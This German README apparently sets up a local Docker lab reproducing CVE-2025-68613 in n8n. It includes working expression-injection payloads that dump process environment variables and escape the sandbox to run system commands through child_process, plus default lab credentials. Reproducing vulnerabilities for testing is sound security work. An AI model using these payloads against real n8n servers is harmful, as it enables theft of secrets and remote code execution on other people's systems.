
Analyse von CVE-2025-68613
Dieses Repository enthält eine einfache Docker-Compose-Einrichtung, die eine verwundbare n8n-Instanz zum lokalen Testen von CVE-2025-68613 ausführt.
Starten Sie den Container:
docker compose up -d
Öffnen Sie n8n in Ihrem Browser:
Melden Sie sich mit den in docker-compose.yml festgelegten Standard-Zugangsdaten an:
adminpassworddocker compose down
Diese Umgebung ist nur für lokale, isolierte Tests gedacht. Setzen Sie diese Instanz nicht dem öffentlichen Internet oder einem nicht vertrauenswürdigen Netzwerk aus. Halten Sie sie in einem privaten, ausschließlich lokalen Netzwerksegment und getrennt von Produktionssystemen. Nutzung auf eigene Gefahr.
Sobald der Container läuft, können Sie über http://localhost:5678 auf die n8n-Oberfläche zugreifen. Um die Schwachstelle zu testen, injizieren Sie eine schädliche JavaScript-Nutzlast in ein Ausdrucksfeld.
Schritte zur Reproduktion:
Test 1: Exfiltration von Umgebungsvariablen. Diese Nutzlast versucht, auf die Umgebungsvariablen des Prozesses zuzugreifen, die häufig Geheimnisse enthalten.
{{ (function() { return this.process.env; })() }}

Test 2: Remote Code Execution (RCE). Diese Nutzlast versucht, das Modul child_process zu laden, um Systembefehle (z. B. whoami) auszuführen.
{{ (function() {
var require = this.process.mainModule.require;
var execSync = require('child_process').execSync;
return execSync('whoami').toString();
})() }}

Erwartetes Ergebnis: Wenn die Umgebung verwundbar ist, zeigt das Bedienfeld „Ausgabe“ des Set-Knotens das Ergebnis des Befehls (z. B. root oder der n8n-Benutzer) oder ein JSON-Objekt mit den Umgebungsvariablen an. Wenn die Instanz gepatcht wäre (z. B. Version 1.122.0+), würde die Sandbox ein leeres Objekt oder einen Fehler zurückgeben.